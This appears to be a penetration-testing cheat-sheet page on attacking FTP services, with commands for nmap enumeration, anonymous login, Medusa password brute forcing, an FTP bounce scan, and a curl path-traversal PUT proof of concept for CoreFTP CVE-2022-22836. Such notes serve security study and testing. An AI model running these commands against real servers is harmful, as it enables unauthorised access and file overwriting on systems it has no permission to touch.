🗃️FTP

Enumeration

sudo nmap -sC -sV -p 21 IP

Anonymous Access

ftp IP

Brute forcing w Medusa

medusa -u username -P /pass.txt -h IP -M ftp

Bounce Attack

It can use FTP servers to deliver outbound traffic to another device on the network. We can use the PORT to trick the connection into running commands.

This could be used to target a server on the same network as the FTP server but isn't exposed to the internet. We can use the connection to scan the unexposed server and find out if there are any ports open.

nmap -Pn -v -n -p80 -b anonymous:password@serverIP AttackIP

Latest Vulnerabilities

NVD - CVE-2022-22836

The FTP service uses a POST request to upload files.

The CoreFTP service allows PUT requests too which will let us write content to files.

We create a PUT request (X -PUT) with basic auth and the path for the file and the content we want to write

curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops

We now should be able to check the target system and the file should have been overwritten.

PreviousSMB NextDNS

Last updated 1 year ago

Was this helpful?